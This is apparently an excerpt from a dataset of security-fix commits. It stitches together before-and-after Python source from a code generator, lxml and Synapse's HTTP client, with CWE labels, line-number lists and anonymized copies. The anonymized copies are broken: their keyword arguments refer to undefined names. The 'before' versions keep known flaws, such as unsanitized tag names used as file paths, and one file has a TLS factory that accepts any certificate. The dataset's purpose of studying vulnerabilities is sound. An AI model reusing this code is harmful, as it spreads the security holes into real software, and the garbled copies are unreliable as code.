VAR_33 = self.env.get_template("async_endpoint_module.pyi")
for tag, collection in self.openapi.endpoint_collections_by_tag.items():
VAR_36 = VAR_26 / f"{tag}.py"
VAR_36.write_text(VAR_32.render(collection=collection))
VAR_37 = VAR_28 / f"{tag}.py"
VAR_37.write_text(VAR_33.render(collection=collection))
|
from __future__ import annotations
import shutil
import subprocess
import sys
from pathlib import Path
from typing import Any, Dict, Optional, Sequence, Union
import httpcore
import httpx
import yaml
from jinja2 import Environment, PackageLoader
from openapi_python_client import utils
from .parser import GeneratorData, import_string_from_reference
from .parser.errors import GeneratorError
if sys.version_info.minor == 7: # version did not exist in 3.7, need to use a backport
from importlib_metadata import version
else:
from importlib.metadata import version # type: ignore
__version__ = version(__package__)
def FUNC_0(VAR_0: Optional[str], VAR_1: Optional[Path]) -> Union[CLASS_0, GeneratorError]:
VAR_2 = FUNC_3(VAR_0=url, VAR_1=path)
if isinstance(VAR_2, GeneratorError):
return VAR_2
VAR_3 = GeneratorData.from_dict(VAR_2)
if isinstance(VAR_3, GeneratorError):
return VAR_3
return CLASS_0(VAR_3=openapi)
def FUNC_1(*, VAR_0: Optional[str], VAR_1: Optional[Path]) -> Sequence[GeneratorError]:
VAR_4 = FUNC_0(VAR_0=url, VAR_1=path)
if isinstance(VAR_4, GeneratorError):
return [VAR_4]
return VAR_4.build()
def FUNC_2(*, VAR_0: Optional[str], VAR_1: Optional[Path]) -> Sequence[GeneratorError]:
VAR_4 = FUNC_0(VAR_0=url, VAR_1=path)
if isinstance(VAR_4, GeneratorError):
return [VAR_4]
return VAR_4.update()
def FUNC_3(*, VAR_0: Optional[str], VAR_1: Optional[Path]) -> Union[Dict[str, Any], GeneratorError]:
VAR_35: bytes
if VAR_0 is not None and VAR_1 is not None:
return GeneratorError(header="Provide URL or Path, not both.")
if VAR_0 is not None:
try:
VAR_34 = httpx.get(VAR_0)
VAR_35 = VAR_34.content
except (httpx.HTTPError, httpcore.NetworkError):
return GeneratorError(header="Could not get OpenAPI document from provided URL")
elif VAR_1 is not None:
VAR_35 = VAR_1.read_bytes()
else:
return GeneratorError(header="No URL or Path provided")
try:
return yaml.safe_load(VAR_35)
except yaml.YAMLError:
return GeneratorError(header="Invalid YAML from provided source")
class CLASS_0:
VAR_5 = {"snakecase": utils.snake_case, "kebabcase": utils.kebab_case}
project_name_override: Optional[str] = None
package_name_override: Optional[str] = None
def __init__(self, *, VAR_3: GeneratorData) -> None:
self.openapi: GeneratorData = VAR_3
self.env: Environment = Environment(loader=PackageLoader(__package__), trim_blocks=True, lstrip_blocks=True)
self.project_name: str = self.project_name_override or f"{utils.kebab_case(VAR_3.title).lower()}-client"
self.project_dir: Path = Path.cwd() / self.project_name
self.package_name: str = self.package_name_override or self.project_name.replace("-", "_")
self.package_dir: Path = self.project_dir / self.package_name
self.package_description: str = f"A client library for accessing {self.openapi.title}"
self.version: str = VAR_3.version
self.env.filters.update(self.TEMPLATE_FILTERS)
def FUNC_4(self) -> Sequence[GeneratorError]:
print(f"Generating {self.project_name}")
try:
self.project_dir.mkdir()
except FileExistsError:
return [GeneratorError(detail="Directory already exists. Delete it or use the FUNC_5 command.")]
self._create_package()
self._build_metadata()
self._build_models()
self._build_api()
self._reformat()
return self._get_errors()
def FUNC_5(self) -> Sequence[GeneratorError]:
if not self.package_dir.is_dir():
raise FileNotFoundError()
print(f"Updating {self.project_name}")
shutil.rmtree(self.package_dir)
self._create_package()
self._build_models()
self._build_api()
self._reformat()
return self._get_errors()
def FUNC_6(self) -> None:
subprocess.run(
"isort .", cwd=self.project_dir, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
)
subprocess.run("black .", cwd=self.project_dir, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def FUNC_7(self) -> Sequence[GeneratorError]:
VAR_6 = []
for collection in self.openapi.endpoint_collections_by_tag.values():
VAR_6.extend(collection.parse_errors)
VAR_6.extend(self.openapi.schemas.errors)
return VAR_6
def FUNC_8(self) -> None:
self.package_dir.mkdir()
VAR_7 = self.package_dir / "__init__.py"
VAR_8 = self.env.get_template("package_init.pyi")
VAR_7.write_text(VAR_8.render(description=self.package_description))
VAR_9 = self.package_dir / "py.typed"
VAR_9.write_text("# Marker file for PEP 561")
def FUNC_9(self) -> None:
VAR_10 = self.env.get_template("pyproject.toml")
VAR_11 = self.project_dir / "pyproject.toml"
VAR_11.write_text(
VAR_10.render(
project_name=self.project_name,
package_name=self.package_name,
version=self.version,
description=self.package_description,
)
)
VAR_12 = self.project_dir / "README.md"
VAR_13 = self.env.get_template("README.md")
VAR_12.write_text(
VAR_13.render(
project_name=self.project_name, description=self.package_description, package_name=self.package_name
)
)
VAR_14 = self.project_dir / ".gitignore"
VAR_15 = self.env.get_template(".gitignore")
VAR_14.write_text(VAR_15.render())
def FUNC_10(self) -> None:
VAR_16 = self.package_dir / "models"
VAR_16.mkdir()
VAR_17 = VAR_16 / "__init__.py"
VAR_18 = []
VAR_19 = self.env.get_template("types.py")
VAR_20 = VAR_16 / "types.py"
VAR_20.write_text(VAR_19.render())
VAR_21 = self.env.get_template("model.pyi")
for model in self.openapi.schemas.models.values():
VAR_36 = VAR_16 / f"{model.reference.module_name}.py"
VAR_36.write_text(VAR_21.render(model=model))
VAR_18.append(import_string_from_reference(model.reference))
VAR_22 = self.env.get_template("enum.pyi")
for enum in self.openapi.enums.values():
VAR_36 = VAR_16 / f"{enum.reference.module_name}.py"
VAR_36.write_text(VAR_22.render(enum=enum))
VAR_18.append(import_string_from_reference(enum.reference))
VAR_23 = self.env.get_template("models_init.pyi")
VAR_17.write_text(VAR_23.render(VAR_18=imports))
def FUNC_11(self) -> None:
VAR_24 = self.package_dir / "client.py"
VAR_25 = self.env.get_template("client.pyi")
VAR_24.write_text(VAR_25.render())
VAR_26 = self.package_dir / "api"
VAR_26.mkdir()
VAR_27 = VAR_26 / "__init__.py"
VAR_27.write_text('""" Contains synchronous methods for accessing the API """')
VAR_28 = self.package_dir / "async_api"
VAR_28.mkdir()
VAR_29 = VAR_28 / "__init__.py"
VAR_29.write_text('""" Contains async methods for accessing the API """')
VAR_30 = self.package_dir / "errors.py"
VAR_31 = self.env.get_template("errors.pyi")
VAR_30.write_text(VAR_31.render())
VAR_32 = self.env.get_template("endpoint_module.pyi")
VAR_33 = self.env.get_template("async_endpoint_module.pyi")
for VAR_37, collection in self.openapi.endpoint_collections_by_tag.items():
VAR_37 = utils.snake_case(VAR_37)
VAR_36 = VAR_26 / f"{VAR_37}.py"
VAR_36.write_text(VAR_32.render(collection=collection))
VAR_38 = VAR_28 / f"{VAR_37}.py"
VAR_38.write_text(VAR_33.render(collection=collection))
| [
3,
9,
14,
16,
19,
24,
25,
27,
28,
37,
38,
42,
50,
51,
55,
63,
64,
83,
84,
89,
93,
96,
101,
103,
106,
118,
121,
131,
137,
144,
147,
149,
152,
155,
157,
168,
169,
177,
178,
182,
184,
189,
193,
199,
200,
206,
209,
211,
215,
216,
221,
226,
230,
238,
1,
40,
41,
42,
43,
44,
45,
53,
54,
55,
56,
57,
58,
105,
120
] | [
3,
9,
14,
16,
19,
24,
25,
27,
28,
37,
38,
42,
50,
51,
55,
63,
64,
83,
84,
89,
93,
96,
101,
103,
106,
118,
121,
131,
137,
144,
147,
149,
152,
155,
157,
168,
169,
177,
178,
182,
184,
189,
193,
199,
200,
206,
209,
211,
215,
216,
221,
226,
230,
239,
1,
40,
41,
42,
43,
44,
45,
53,
54,
55,
56,
57,
58,
105,
120
] |
1CWE-79
| # this is a package
__version__ = "4.6.4"
def get_include():
"""
Returns a list of header include paths (for lxml itself, libxml2
and libxslt) needed to compile C code against lxml if it was built
with statically linked libraries.
"""
import os
lxml_path = __path__[0]
include_path = os.path.join(lxml_path, 'includes')
includes = [include_path, lxml_path]
for name in os.listdir(include_path):
path = os.path.join(include_path, name)
if os.path.isdir(path):
includes.append(path)
return includes
| # this is a package
__version__ = "4.6.5"
def get_include():
"""
Returns a list of header include paths (for lxml itself, libxml2
and libxslt) needed to compile C code against lxml if it was built
with statically linked libraries.
"""
import os
lxml_path = __path__[0]
include_path = os.path.join(lxml_path, 'includes')
includes = [include_path, lxml_path]
for name in os.listdir(include_path):
path = os.path.join(include_path, name)
if os.path.isdir(path):
includes.append(path)
return includes
| xss | {
"code": [
"__version__ = \"4.6.4\""
],
"line_no": [
3
]
} | {
"code": [
"__version__ = \"4.6.5\""
],
"line_no": [
3
]
} |
__version__ = "4.6.4"
def FUNC_0():
import os
VAR_0 = __path__[0]
VAR_1 = os.path.join(VAR_0, 'includes')
VAR_2 = [VAR_1, VAR_0]
for name in os.listdir(VAR_1):
VAR_3 = os.path.join(VAR_1, name)
if os.path.isdir(VAR_3):
VAR_2.append(VAR_3)
return VAR_2
|
__version__ = "4.6.5"
def FUNC_0():
import os
VAR_0 = __path__[0]
VAR_1 = os.path.join(VAR_0, 'includes')
VAR_2 = [VAR_1, VAR_0]
for name in os.listdir(VAR_1):
VAR_3 = os.path.join(VAR_1, name)
if os.path.isdir(VAR_3):
VAR_2.append(VAR_3)
return VAR_2
| [
1,
2,
4,
5,
16,
21,
23,
24,
7,
8,
9,
10,
11
] | [
1,
2,
4,
5,
16,
21,
23,
24,
7,
8,
9,
10,
11
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import urllib.parse
from io import BytesIO
from typing import (
TYPE_CHECKING,
Any,
BinaryIO,
Dict,
Iterable,
List,
Mapping,
Optional,
Sequence,
Tuple,
Union,
)
import treq
from canonicaljson import encode_canonical_json
from netaddr import IPAddress, IPSet
from prometheus_client import Counter
from zope.interface import implementer, provider
from OpenSSL import SSL
from OpenSSL.SSL import VERIFY_NONE
from twisted.internet import defer, error as twisted_error, protocol, ssl
from twisted.internet.interfaces import (
IAddress,
IHostResolution,
IReactorPluggableNameResolver,
IResolutionReceiver,
)
from twisted.internet.task import Cooperator
from twisted.python.failure import Failure
from twisted.web._newclient import ResponseDone
from twisted.web.client import (
Agent,
HTTPConnectionPool,
ResponseNeverReceived,
readBody,
)
from twisted.web.http import PotentialDataLoss
from twisted.web.http_headers import Headers
from twisted.web.iweb import IAgent, IBodyProducer, IResponse
from synapse.api.errors import Codes, HttpResponseException, SynapseError
from synapse.http import QuieterFileBodyProducer, RequestTimedOutError, redact_uri
from synapse.http.proxyagent import ProxyAgent
from synapse.logging.context import make_deferred_yieldable
from synapse.logging.opentracing import set_tag, start_active_span, tags
from synapse.util import json_decoder
from synapse.util.async_helpers import timeout_deferred
if TYPE_CHECKING:
from synapse.app.homeserver import HomeServer
logger = logging.getLogger(__name__)
outgoing_requests_counter = Counter("synapse_http_client_requests", "", ["method"])
incoming_responses_counter = Counter(
"synapse_http_client_responses", "", ["method", "code"]
)
# the type of the headers list, to be passed to the t.w.h.Headers.
# Actually we can mix str and bytes keys, but Mapping treats 'key' as invariant so
# we simplify.
RawHeaders = Union[Mapping[str, "RawHeaderValue"], Mapping[bytes, "RawHeaderValue"]]
# the value actually has to be a List, but List is invariant so we can't specify that
# the entries can either be Lists or bytes.
RawHeaderValue = Sequence[Union[str, bytes]]
# the type of the query params, to be passed into `urlencode`
QueryParamValue = Union[str, bytes, Iterable[Union[str, bytes]]]
QueryParams = Union[Mapping[str, QueryParamValue], Mapping[bytes, QueryParamValue]]
def check_against_blacklist(
ip_address: IPAddress, ip_whitelist: Optional[IPSet], ip_blacklist: IPSet
) -> bool:
"""
Compares an IP address to allowed and disallowed IP sets.
Args:
ip_address: The IP address to check
ip_whitelist: Allowed IP addresses.
ip_blacklist: Disallowed IP addresses.
Returns:
True if the IP address is in the blacklist and not in the whitelist.
"""
if ip_address in ip_blacklist:
if ip_whitelist is None or ip_address not in ip_whitelist:
return True
return False
_EPSILON = 0.00000001
def _make_scheduler(reactor):
"""Makes a schedular suitable for a Cooperator using the given reactor.
(This is effectively just a copy from `twisted.internet.task`)
"""
def _scheduler(x):
return reactor.callLater(_EPSILON, x)
return _scheduler
class IPBlacklistingResolver:
"""
A proxy for reactor.nameResolver which only produces non-blacklisted IP
addresses, preventing DNS rebinding attacks on URL preview.
"""
def __init__(
self,
reactor: IReactorPluggableNameResolver,
ip_whitelist: Optional[IPSet],
ip_blacklist: IPSet,
):
"""
Args:
reactor: The twisted reactor.
ip_whitelist: IP addresses to allow.
ip_blacklist: IP addresses to disallow.
"""
self._reactor = reactor
self._ip_whitelist = ip_whitelist
self._ip_blacklist = ip_blacklist
def resolveHostName(
self, recv: IResolutionReceiver, hostname: str, portNumber: int = 0
) -> IResolutionReceiver:
r = recv()
addresses = [] # type: List[IAddress]
def _callback() -> None:
r.resolutionBegan(None)
has_bad_ip = False
for i in addresses:
ip_address = IPAddress(i.host)
if check_against_blacklist(
ip_address, self._ip_whitelist, self._ip_blacklist
):
logger.info(
"Dropped %s from DNS resolution to %s due to blacklist"
% (ip_address, hostname)
)
has_bad_ip = True
# if we have a blacklisted IP, we'd like to raise an error to block the
# request, but all we can really do from here is claim that there were no
# valid results.
if not has_bad_ip:
for i in addresses:
r.addressResolved(i)
r.resolutionComplete()
@provider(IResolutionReceiver)
class EndpointReceiver:
@staticmethod
def resolutionBegan(resolutionInProgress: IHostResolution) -> None:
pass
@staticmethod
def addressResolved(address: IAddress) -> None:
addresses.append(address)
@staticmethod
def resolutionComplete() -> None:
_callback()
self._reactor.nameResolver.resolveHostName(
EndpointReceiver, hostname, portNumber=portNumber
)
return r
class BlacklistingAgentWrapper(Agent):
"""
An Agent wrapper which will prevent access to IP addresses being accessed
directly (without an IP address lookup).
"""
def __init__(
self,
agent: IAgent,
ip_whitelist: Optional[IPSet] = None,
ip_blacklist: Optional[IPSet] = None,
):
"""
Args:
agent: The Agent to wrap.
ip_whitelist: IP addresses to allow.
ip_blacklist: IP addresses to disallow.
"""
self._agent = agent
self._ip_whitelist = ip_whitelist
self._ip_blacklist = ip_blacklist
def request(
self,
method: bytes,
uri: bytes,
headers: Optional[Headers] = None,
bodyProducer: Optional[IBodyProducer] = None,
) -> defer.Deferred:
h = urllib.parse.urlparse(uri.decode("ascii"))
try:
ip_address = IPAddress(h.hostname)
if check_against_blacklist(
ip_address, self._ip_whitelist, self._ip_blacklist
):
logger.info("Blocking access to %s due to blacklist" % (ip_address,))
e = SynapseError(403, "IP address blocked by IP blacklist entry")
return defer.fail(Failure(e))
except Exception:
# Not an IP
pass
return self._agent.request(
method, uri, headers=headers, bodyProducer=bodyProducer
)
class SimpleHttpClient:
"""
A simple, no-frills HTTP client with methods that wrap up common ways of
using HTTP in Matrix
"""
def __init__(
self,
hs: "HomeServer",
treq_args: Dict[str, Any] = {},
ip_whitelist: Optional[IPSet] = None,
ip_blacklist: Optional[IPSet] = None,
http_proxy: Optional[bytes] = None,
https_proxy: Optional[bytes] = None,
):
"""
Args:
hs
treq_args: Extra keyword arguments to be given to treq.request.
ip_blacklist: The IP addresses that are blacklisted that
we may not request.
ip_whitelist: The whitelisted IP addresses, that we can
request if it were otherwise caught in a blacklist.
http_proxy: proxy server to use for http connections. host[:port]
https_proxy: proxy server to use for https connections. host[:port]
"""
self.hs = hs
self._ip_whitelist = ip_whitelist
self._ip_blacklist = ip_blacklist
self._extra_treq_args = treq_args
self.user_agent = hs.version_string
self.clock = hs.get_clock()
if hs.config.user_agent_suffix:
self.user_agent = "%s %s" % (self.user_agent, hs.config.user_agent_suffix)
# We use this for our body producers to ensure that they use the correct
# reactor.
self._cooperator = Cooperator(scheduler=_make_scheduler(hs.get_reactor()))
self.user_agent = self.user_agent.encode("ascii")
if self._ip_blacklist:
real_reactor = hs.get_reactor()
# If we have an IP blacklist, we need to use a DNS resolver which
# filters out blacklisted IP addresses, to prevent DNS rebinding.
nameResolver = IPBlacklistingResolver(
real_reactor, self._ip_whitelist, self._ip_blacklist
)
@implementer(IReactorPluggableNameResolver)
class Reactor:
def __getattr__(_self, attr):
if attr == "nameResolver":
return nameResolver
else:
return getattr(real_reactor, attr)
self.reactor = Reactor()
else:
self.reactor = hs.get_reactor()
# the pusher makes lots of concurrent SSL connections to sygnal, and
# tends to do so in batches, so we need to allow the pool to keep
# lots of idle connections around.
pool = HTTPConnectionPool(self.reactor)
# XXX: The justification for using the cache factor here is that larger instances
# will need both more cache and more connections.
# Still, this should probably be a separate dial
pool.maxPersistentPerHost = max((100 * hs.config.caches.global_factor, 5))
pool.cachedConnectionTimeout = 2 * 60
self.agent = ProxyAgent(
self.reactor,
connectTimeout=15,
contextFactory=self.hs.get_http_client_context_factory(),
pool=pool,
http_proxy=http_proxy,
https_proxy=https_proxy,
)
if self._ip_blacklist:
# If we have an IP blacklist, we then install the blacklisting Agent
# which prevents direct access to IP addresses, that are not caught
# by the DNS resolution.
self.agent = BlacklistingAgentWrapper(
self.agent,
ip_whitelist=self._ip_whitelist,
ip_blacklist=self._ip_blacklist,
)
async def request(
self,
method: str,
uri: str,
data: Optional[bytes] = None,
headers: Optional[Headers] = None,
) -> IResponse:
"""
Args:
method: HTTP method to use.
uri: URI to query.
data: Data to send in the request body, if applicable.
headers: Request headers.
Returns:
Response object, once the headers have been read.
Raises:
RequestTimedOutError if the request times out before the headers are read
"""
outgoing_requests_counter.labels(method).inc()
# log request but strip `access_token` (AS requests for example include this)
logger.debug("Sending request %s %s", method, redact_uri(uri))
with start_active_span(
"outgoing-client-request",
tags={
tags.SPAN_KIND: tags.SPAN_KIND_RPC_CLIENT,
tags.HTTP_METHOD: method,
tags.HTTP_URL: uri,
},
finish_on_close=True,
):
try:
body_producer = None
if data is not None:
body_producer = QuieterFileBodyProducer(
BytesIO(data), cooperator=self._cooperator,
)
request_deferred = treq.request(
method,
uri,
agent=self.agent,
data=body_producer,
headers=headers,
**self._extra_treq_args,
) # type: defer.Deferred
# we use our own timeout mechanism rather than treq's as a workaround
# for https://twistedmatrix.com/trac/ticket/9534.
request_deferred = timeout_deferred(
request_deferred, 60, self.hs.get_reactor(),
)
# turn timeouts into RequestTimedOutErrors
request_deferred.addErrback(_timeout_to_request_timed_out_error)
response = await make_deferred_yieldable(request_deferred)
incoming_responses_counter.labels(method, response.code).inc()
logger.info(
"Received response to %s %s: %s",
method,
redact_uri(uri),
response.code,
)
return response
except Exception as e:
incoming_responses_counter.labels(method, "ERR").inc()
logger.info(
"Error sending request to %s %s: %s %s",
method,
redact_uri(uri),
type(e).__name__,
e.args[0],
)
set_tag(tags.ERROR, True)
set_tag("error_reason", e.args[0])
raise
async def post_urlencoded_get_json(
self,
uri: str,
args: Optional[Mapping[str, Union[str, List[str]]]] = None,
headers: Optional[RawHeaders] = None,
) -> Any:
"""
Args:
uri: uri to query
args: parameters to be url-encoded in the body
headers: a map from header name to a list of values for that header
Returns:
parsed json
Raises:
RequestTimedOutError: if there is a timeout before the response headers
are received. Note there is currently no timeout on reading the response
body.
HttpResponseException: On a non-2xx HTTP response.
ValueError: if the response was not JSON
"""
# TODO: Do we ever want to log message contents?
logger.debug("post_urlencoded_get_json args: %s", args)
query_bytes = encode_query_args(args)
actual_headers = {
b"Content-Type": [b"application/x-www-form-urlencoded"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if headers:
actual_headers.update(headers) # type: ignore
response = await self.request(
"POST", uri, headers=Headers(actual_headers), data=query_bytes
)
body = await make_deferred_yieldable(readBody(response))
if 200 <= response.code < 300:
return json_decoder.decode(body.decode("utf-8"))
else:
raise HttpResponseException(
response.code, response.phrase.decode("ascii", errors="replace"), body
)
async def post_json_get_json(
self, uri: str, post_json: Any, headers: Optional[RawHeaders] = None
) -> Any:
"""
Args:
uri: URI to query.
post_json: request body, to be encoded as json
headers: a map from header name to a list of values for that header
Returns:
parsed json
Raises:
RequestTimedOutError: if there is a timeout before the response headers
are received. Note there is currently no timeout on reading the response
body.
HttpResponseException: On a non-2xx HTTP response.
ValueError: if the response was not JSON
"""
json_str = encode_canonical_json(post_json)
logger.debug("HTTP POST %s -> %s", json_str, uri)
actual_headers = {
b"Content-Type": [b"application/json"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if headers:
actual_headers.update(headers) # type: ignore
response = await self.request(
"POST", uri, headers=Headers(actual_headers), data=json_str
)
body = await make_deferred_yieldable(readBody(response))
if 200 <= response.code < 300:
return json_decoder.decode(body.decode("utf-8"))
else:
raise HttpResponseException(
response.code, response.phrase.decode("ascii", errors="replace"), body
)
async def get_json(
self,
uri: str,
args: Optional[QueryParams] = None,
headers: Optional[RawHeaders] = None,
) -> Any:
"""Gets some json from the given URI.
Args:
uri: The URI to request, not including query parameters
args: A dictionary used to create query string
headers: a map from header name to a list of values for that header
Returns:
Succeeds when we get a 2xx HTTP response, with the HTTP body as JSON.
Raises:
RequestTimedOutError: if there is a timeout before the response headers
are received. Note there is currently no timeout on reading the response
body.
HttpResponseException On a non-2xx HTTP response.
ValueError: if the response was not JSON
"""
actual_headers = {b"Accept": [b"application/json"]}
if headers:
actual_headers.update(headers) # type: ignore
body = await self.get_raw(uri, args, headers=headers)
return json_decoder.decode(body.decode("utf-8"))
async def put_json(
self,
uri: str,
json_body: Any,
args: Optional[QueryParams] = None,
headers: RawHeaders = None,
) -> Any:
"""Puts some json to the given URI.
Args:
uri: The URI to request, not including query parameters
json_body: The JSON to put in the HTTP body,
args: A dictionary used to create query strings
headers: a map from header name to a list of values for that header
Returns:
Succeeds when we get a 2xx HTTP response, with the HTTP body as JSON.
Raises:
RequestTimedOutError: if there is a timeout before the response headers
are received. Note there is currently no timeout on reading the response
body.
HttpResponseException On a non-2xx HTTP response.
ValueError: if the response was not JSON
"""
if args:
query_str = urllib.parse.urlencode(args, True)
uri = "%s?%s" % (uri, query_str)
json_str = encode_canonical_json(json_body)
actual_headers = {
b"Content-Type": [b"application/json"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if headers:
actual_headers.update(headers) # type: ignore
response = await self.request(
"PUT", uri, headers=Headers(actual_headers), data=json_str
)
body = await make_deferred_yieldable(readBody(response))
if 200 <= response.code < 300:
return json_decoder.decode(body.decode("utf-8"))
else:
raise HttpResponseException(
response.code, response.phrase.decode("ascii", errors="replace"), body
)
async def get_raw(
self,
uri: str,
args: Optional[QueryParams] = None,
headers: Optional[RawHeaders] = None,
) -> bytes:
"""Gets raw text from the given URI.
Args:
uri: The URI to request, not including query parameters
args: A dictionary used to create query strings
headers: a map from header name to a list of values for that header
Returns:
Succeeds when we get a 2xx HTTP response, with the
HTTP body as bytes.
Raises:
RequestTimedOutError: if there is a timeout before the response headers
are received. Note there is currently no timeout on reading the response
body.
HttpResponseException on a non-2xx HTTP response.
"""
if args:
query_str = urllib.parse.urlencode(args, True)
uri = "%s?%s" % (uri, query_str)
actual_headers = {b"User-Agent": [self.user_agent]}
if headers:
actual_headers.update(headers) # type: ignore
response = await self.request("GET", uri, headers=Headers(actual_headers))
body = await make_deferred_yieldable(readBody(response))
if 200 <= response.code < 300:
return body
else:
raise HttpResponseException(
response.code, response.phrase.decode("ascii", errors="replace"), body
)
# XXX: FIXME: This is horribly copy-pasted from matrixfederationclient.
# The two should be factored out.
async def get_file(
self,
url: str,
output_stream: BinaryIO,
max_size: Optional[int] = None,
headers: Optional[RawHeaders] = None,
) -> Tuple[int, Dict[bytes, List[bytes]], str, int]:
"""GETs a file from a given URL
Args:
url: The URL to GET
output_stream: File to write the response body to.
headers: A map from header name to a list of values for that header
Returns:
A tuple of the file length, dict of the response
headers, absolute URI of the response and HTTP response code.
Raises:
RequestTimedOutError: if there is a timeout before the response headers
are received. Note there is currently no timeout on reading the response
body.
SynapseError: if the response is not a 2xx, the remote file is too large, or
another exception happens during the download.
"""
actual_headers = {b"User-Agent": [self.user_agent]}
if headers:
actual_headers.update(headers) # type: ignore
response = await self.request("GET", url, headers=Headers(actual_headers))
resp_headers = dict(response.headers.getAllRawHeaders())
if (
b"Content-Length" in resp_headers
and max_size
and int(resp_headers[b"Content-Length"][0]) > max_size
):
logger.warning("Requested URL is too large > %r bytes" % (max_size,))
raise SynapseError(
502,
"Requested file is too large > %r bytes" % (max_size,),
Codes.TOO_LARGE,
)
if response.code > 299:
logger.warning("Got %d when downloading %s" % (response.code, url))
raise SynapseError(502, "Got error %d" % (response.code,), Codes.UNKNOWN)
# TODO: if our Content-Type is HTML or something, just read the first
# N bytes into RAM rather than saving it all to disk only to read it
# straight back in again
try:
length = await make_deferred_yieldable(
readBodyToFile(response, output_stream, max_size)
)
except SynapseError:
# This can happen e.g. because the body is too large.
raise
except Exception as e:
raise SynapseError(502, ("Failed to download remote body: %s" % e)) from e
return (
length,
resp_headers,
response.request.absoluteURI.decode("ascii"),
response.code,
)
def _timeout_to_request_timed_out_error(f: Failure):
if f.check(twisted_error.TimeoutError, twisted_error.ConnectingCancelledError):
# The TCP connection has its own timeout (set by the 'connectTimeout' param
# on the Agent), which raises twisted_error.TimeoutError exception.
raise RequestTimedOutError("Timeout connecting to remote server")
elif f.check(defer.TimeoutError, ResponseNeverReceived):
# this one means that we hit our overall timeout on the request
raise RequestTimedOutError("Timeout waiting for response from remote server")
return f
class _ReadBodyToFileProtocol(protocol.Protocol):
def __init__(
self, stream: BinaryIO, deferred: defer.Deferred, max_size: Optional[int]
):
self.stream = stream
self.deferred = deferred
self.length = 0
self.max_size = max_size
def dataReceived(self, data: bytes) -> None:
self.stream.write(data)
self.length += len(data)
if self.max_size is not None and self.length >= self.max_size:
self.deferred.errback(
SynapseError(
502,
"Requested file is too large > %r bytes" % (self.max_size,),
Codes.TOO_LARGE,
)
)
self.deferred = defer.Deferred()
self.transport.loseConnection()
def connectionLost(self, reason: Failure) -> None:
if reason.check(ResponseDone):
self.deferred.callback(self.length)
elif reason.check(PotentialDataLoss):
# stolen from https://github.com/twisted/treq/pull/49/files
# http://twistedmatrix.com/trac/ticket/4840
self.deferred.callback(self.length)
else:
self.deferred.errback(reason)
def readBodyToFile(
response: IResponse, stream: BinaryIO, max_size: Optional[int]
) -> defer.Deferred:
"""
Read a HTTP response body to a file-object. Optionally enforcing a maximum file size.
Args:
response: The HTTP response to read from.
stream: The file-object to write to.
max_size: The maximum file size to allow.
Returns:
A Deferred which resolves to the length of the read body.
"""
d = defer.Deferred()
response.deliverBody(_ReadBodyToFileProtocol(stream, d, max_size))
return d
def encode_query_args(args: Optional[Mapping[str, Union[str, List[str]]]]) -> bytes:
"""
Encodes a map of query arguments to bytes which can be appended to a URL.
Args:
args: The query arguments, a mapping of string to string or list of strings.
Returns:
The query arguments encoded as bytes.
"""
if args is None:
return b""
encoded_args = {}
for k, vs in args.items():
if isinstance(vs, str):
vs = [vs]
encoded_args[k] = [v.encode("utf8") for v in vs]
query_str = urllib.parse.urlencode(encoded_args, True)
return query_str.encode("utf8")
class InsecureInterceptableContextFactory(ssl.ContextFactory):
"""
Factory for PyOpenSSL SSL contexts which accepts any certificate for any domain.
Do not use this since it allows an attacker to intercept your communications.
"""
def __init__(self):
self._context = SSL.Context(SSL.SSLv23_METHOD)
self._context.set_verify(VERIFY_NONE, lambda *_: None)
def getContext(self, hostname=None, port=None):
return self._context
def creatorForNetloc(self, hostname, port):
return self
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import urllib.parse
from io import BytesIO
from typing import (
TYPE_CHECKING,
Any,
BinaryIO,
Dict,
Iterable,
List,
Mapping,
Optional,
Sequence,
Tuple,
Union,
)
import treq
from canonicaljson import encode_canonical_json
from netaddr import IPAddress, IPSet
from prometheus_client import Counter
from zope.interface import implementer, provider
from OpenSSL import SSL
from OpenSSL.SSL import VERIFY_NONE
from twisted.internet import defer, error as twisted_error, protocol, ssl
from twisted.internet.interfaces import (
IAddress,
IHostResolution,
IReactorPluggableNameResolver,
IResolutionReceiver,
)
from twisted.internet.task import Cooperator
from twisted.python.failure import Failure
from twisted.web._newclient import ResponseDone
from twisted.web.client import (
Agent,
HTTPConnectionPool,
ResponseNeverReceived,
readBody,
)
from twisted.web.http import PotentialDataLoss
from twisted.web.http_headers import Headers
from twisted.web.iweb import IAgent, IBodyProducer, IResponse
from synapse.api.errors import Codes, HttpResponseException, SynapseError
from synapse.http import QuieterFileBodyProducer, RequestTimedOutError, redact_uri
from synapse.http.proxyagent import ProxyAgent
from synapse.logging.context import make_deferred_yieldable
from synapse.logging.opentracing import set_tag, start_active_span, tags
from synapse.util import json_decoder
from synapse.util.async_helpers import timeout_deferred
if TYPE_CHECKING:
from synapse.app.homeserver import HomeServer
logger = logging.getLogger(__name__)
outgoing_requests_counter = Counter("synapse_http_client_requests", "", ["method"])
incoming_responses_counter = Counter(
"synapse_http_client_responses", "", ["method", "code"]
)
# the type of the headers list, to be passed to the t.w.h.Headers.
# Actually we can mix str and bytes keys, but Mapping treats 'key' as invariant so
# we simplify.
RawHeaders = Union[Mapping[str, "RawHeaderValue"], Mapping[bytes, "RawHeaderValue"]]
